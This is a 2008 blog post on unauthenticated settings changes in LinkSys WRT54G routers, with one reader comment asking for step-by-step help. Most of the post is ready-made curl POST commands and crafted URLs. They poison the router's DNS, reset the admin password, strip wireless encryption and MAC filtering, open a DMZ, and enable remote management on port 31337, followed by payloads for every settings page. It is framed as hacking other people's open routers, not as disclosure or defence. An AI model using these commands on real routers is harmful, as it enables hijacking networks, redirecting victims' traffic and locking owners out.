Hacking LinkSys routers via remote security bypass.

by The Uni-Hacker on Jun.25, 2008, under Security

The WRT54G LinkSys wireless routers suffer from security bypass vulnerabilities. When left unencrypted a user could change settings on your router making it useless, or changing the way it works. Some settings that can be changed via remote URL’s are: retore factory defaults, reset admin password, enable mixed wireless mode, disable all wireless encryption, disable mac filtering, and a whole bunch of others.

On a side note, the administrative username and password is stored in clear text in config.bin on the device. It seems LinkSys would want to at least encrypt this file. Almost any value can be changed using the methods below.

There is no evidence that this can be done on an encrypted wireless router. You’d have to have an already established connection to be able to enter the following URL’s into in order to change settings. No connection, no ip address, no worries. Those that leave their routers wide open and on the default setting will be the unguarded victims of a cracker.

The settings are done via the httpd service on the router. My changing URL query’s you can make changes to the routers settings. No authorization required!
 /****************************** * No Authentication Required! * ******************************/ ############################################################################ What: poison dns. dns 1 = 1.2.3.4 dns 2 = 5.6.7.8 dns 3 = 9.8.7.6 Where: http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en How: curl -d “dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en” http://192.168.1.1/Basic.tri ############################################################################ What: restore factory defaults. Where: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en How: curl -d “FactoryDefaults=Yes&layout=en” http://192.168.1.1/factdefa.tri ############################################################################ What: restore basic setup options to default. Where: http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en How: curl -d “dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en” http://192.168.1.1/Basic.tri ############################################################################ What: reset administrative password to ‘asdf’. Where: http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en How: curl -d “remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en” http://192.168.1.1/manage.tri ############################################################################ What: enable mixed wireless network mode with SSID ‘pwnage’ on channel 6, SSID broadcasting enabled. Where: http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en How: curl -d “submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en” http://192.168.1.1/WBasic.tri ############################################################################ What: disable all wireless encryption. Where: http://192.168.1.1/Security.tri?SecurityMode=0&layout=en How: curl -d “SecurityMode=0&layout=en” http://192.168.1.1/Security.tri ############################################################################ What: disable wireless MAC filtering. Where: http://192.168.1.1/WFilter.tri?wl_macmode1=0 How: curl -d “wl_macmode1=0″ http://192.168.1.1/WFilter.tri ############################################################################ What: enable DMZ to ip 192.168.1.100. Where: http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en How: curl -d “action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en” http://192.168.1.1/dmz.tri ############################################################################ What: disable DMZ. Where: http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=0&layout=en How: curl -d “action=Apply&dmz_enable=0&layout=en” http://192.168.1.1/dmz.tri ############################################################################ What: enable remote management on port 31337 with password ‘asdf’, wireless web access and UPnP enabled. Where: http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en How: curl -d “remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en” http://192.168.1.1/manage.tri ############################################################################ /****************************** ****** Defaults: ****** ******************************/ ############################################################################ Setup->Basic Setup: POST /Basic.tri dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en ############################################################################ Setup->DDNS: POST /ddns.tri ddns_enable=0 ############################################################################ Setup->MAC Address Clone: POST /WanMac.tri action=Apply&mac_clone_enable=0 ############################################################################ Setup->Advanced Routing: POST /AdvRoute.tri action=Apply&bSRoute=1&oldOpMode=0&wk_mode=0&route_page=0&route_name=&route_ipaddr_0=0&route_ipaddr_1=0&route_ipaddr_2=0&route_ipaddr_3=0&route_netmask_0=0&route_netmask_1=0&route_netmask_2=0&route_netmask_3=0&route_gateway_0=0&route_gateway_1=0&route_gateway_2=0&route_gateway_3=0&route_ifname=0 ############################################################################ Wireless->Basic Wireless Settings: POST /WBasic.tri submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=linksys&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en ############################################################################ Wireless->Wireless Security: POST /Security.tri SecurityMode=0&layout=en ############################################################################ Wireless->Wireless MAC Filter: POST /WFilter.tri wl_macmode1=0 ############################################################################ Wireless->Advanced Wireless Settings: POST /Advanced.tri AuthType=0&basicrate=default&wl_rate=0&wMode=3&sectype=0&ctspmode=off&FrameBurst=off&BeaconInterval=100&Dtim=1&FragLen=2346&RTSThre=2347&apisolation=0&apSESmode=1 ############################################################################ Security->Firewall: POST /fw.tri ident_pass=1&action=Apply&block_wan=1&IGMP=1&_ident_pass=1 ############################################################################ Security->VPN: POST /vpn.tri action=Apply&ipsec_pass=1&pptp_pass=1&l2tp_pass=1 ############################################################################ Access Restrictions->Internet Access: POST /filter.tri action=Apply&f_id=0&f_status1=disable&f_name=&f_status2=1&day_all=1&time_all=1&FROM_AMPM=0&TO_AMPM=0&blocked_service0=NONE&blocked_service1=NONE&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5= ############################################################################ Applications & Gaming->Port Range Forward: POST /PortRange.tri action=Apply&RuleID_0=0&name0=&from0=0&to0=0&pro0=both&ip0=0&RuleID_1=0&name1=&from1=0&to1=0&pro1=both&ip1=0&RuleID_2=0&name2=&from2=0&to2=0&pro2=both&ip2=0&RuleID_3=0&name3=&from3=0&to3=0&pro3=both&ip3=0&RuleID_4=0&name4=&from4=0&to4=0&pro4=both&ip4=0&RuleID_5=0&name5=&from5=0&to5=0&pro5=both&ip5=0&RuleID_6=0&name6=&from6=0&to6=0&pro6=both&ip6=0&RuleID_7=0&name7=&from7=0&to7=0&pro7=both&ip7=0&RuleID_8=0&name8=&from8=0&to8=0&pro8=both&ip8=0&RuleID_9=0&name9=&from9=0&to9=0&pro9=both&ip9=0 ############################################################################ Applications & Gaming->Port Triggering: POST /ptrigger.tri RuleID_0=&service_name0=&tfrom0=0&tto0=0&rfrom0=0&rto0=0&RuleID_1=&service_name1=&tfrom1=0&tto1=0&rfrom1=0&rto1=0&RuleID_2=&service_name2=&tfrom2=0&tto2=0&rfrom2=0&rto2=0&RuleID_3=&service_name3=&tfrom3=0&tto3=0&rfrom3=0&rto3=0&RuleID_4=&service_name4=&tfrom4=0&tto4=0&rfrom4=0&rto4=0&RuleID_5=&service_name5=&tfrom5=0&tto5=0&rfrom5=0&rto5=0&RuleID_6=&service_name6=&tfrom6=0&tto6=0&rfrom6=0&rto6=0&RuleID_7=&service_name7=&tfrom7=0&tto7=0&rfrom7=0&rto7=0&RuleID_8=&service_name8=&tfrom8=0&tto8=0&rfrom8=0&rto8=0&RuleID_9=&service_name9=&tfrom9=0&tto9=0&rfrom9=0&rto9=0&trinamelist=&layout=en ############################################################################ Applications & Gaming->DMZ: POST /dmz.tri action=Apply&dmz_enable=0&layout=en ############################################################################ Applications & Gaming->QoS: POST /qos.tri hport_priority_1=0&hport_priority_2=0&hport_priority_3=0&hport_priority_4=0&hport_flow_control_1=1&hport_flow_control_2=1&hport_flow_control_3=1&hport_flow_control_4=1&happname1=&hport1priority=0&happport1=0&happname2=&hport2priority=0&happport2=0&happname3=&hport3priority=0&happport3=0&happname4=&hport4priority=0&happport4=0&happname5=&hport5priority=0&happport5=0&happname6=&hport6priority=0&happport6=0&happname7=&hport7priority=0&happport7=0&happname8=&hport8priority=0&happport8=0&QoS=0&wl_wme=off&layout=en ############################################################################ Administration->Management: POST /manage.tri remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=d6nw5v1×2pc7st9m&http_passwdConfirm=d6nw5v1×2pc7st9m&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en ############################################################################ Administration->Log: POST /ctlog.tri log_enable=0 ############################################################################ Administration->Diagnostics->Ping: POST /ping.tri action=start&ping_ip=kinqpinz.info&ping_times=5 ############################################################################ Administration->Diagnostics->Trace Route: POST /tracert.tri action=start&traceroute_ip=kinqpinz.info ############################################################################ Administration->Factory Defaults: ############################################################################ Administration->Firmware Upgrade: ############################################################################ Administration->Config Management: ############################################################################ Status->Router->DHCP Release: POST /rstatus.tri action=release&wan_pro=0&conn_stats=4294967295&layout=en ############################################################################ Status->Router->DHCP Renew: POST /rstatus.tri action=renew&wan_pro=0&conn_stats=4294967295&layout=en ############################################################################ Status->Local Network: ############################################################################ Status->Wireless: ############################################################################

:WRT54G

Click the

to view the picture in full size.

Discussion

1 comment for this entry:

FADI WAHHAB
September 21st, 2008 on 6:53 am
i tried to reset administrative password to ‘asdf’, but it didn’t work, please inform me hoe to do it step by step.

thanks.

Hacking LinkSys routers via remote security bypass.

Hacking LinkSys routers via remote security bypass.

Discussion

Leave a Reply

Looking for something?

Visit our friends!

Archives

Security Code: